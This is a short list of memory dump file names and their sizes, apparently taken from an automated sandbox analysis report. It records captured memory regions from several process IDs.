        • memory/2708-15-0x0000000002A50000-0x0000000002AD0000-memory.dmp

          Filesize

          512KB

        • memory/2708-16-0x000000001B480000-0x000000001B762000-memory.dmp

          Filesize

          2.9MB

        • memory/2728-231-0x000000001B390000-0x000000001B672000-memory.dmp

          Filesize

          2.9MB

        • memory/2780-42-0x0000000000A40000-0x0000000000A5E000-memory.dmp

          Filesize

          120KB

        • memory/2808-43-0x0000000001270000-0x0000000001286000-memory.dmp

          Filesize

          88KB

        • memory/2820-23-0x00000000000D0000-0x0000000001402000-memory.dmp

          Filesize

          19.2MB

        • memory/2912-34-0x0000000000EF0000-0x0000000000F0A000-memory.dmp

          Filesize

          104KB

        • memory/2948-237-0x00000000022E0000-0x00000000022E8000-memory.dmp

          Filesize

          32KB

        • memory/2976-468-0x00000000012C0000-0x00000000012DE000-memory.dmp

          Filesize

          120KB

        • memory/3040-455-0x00000000012B0000-0x00000000012E0000-memory.dmp

          Filesize

          192KB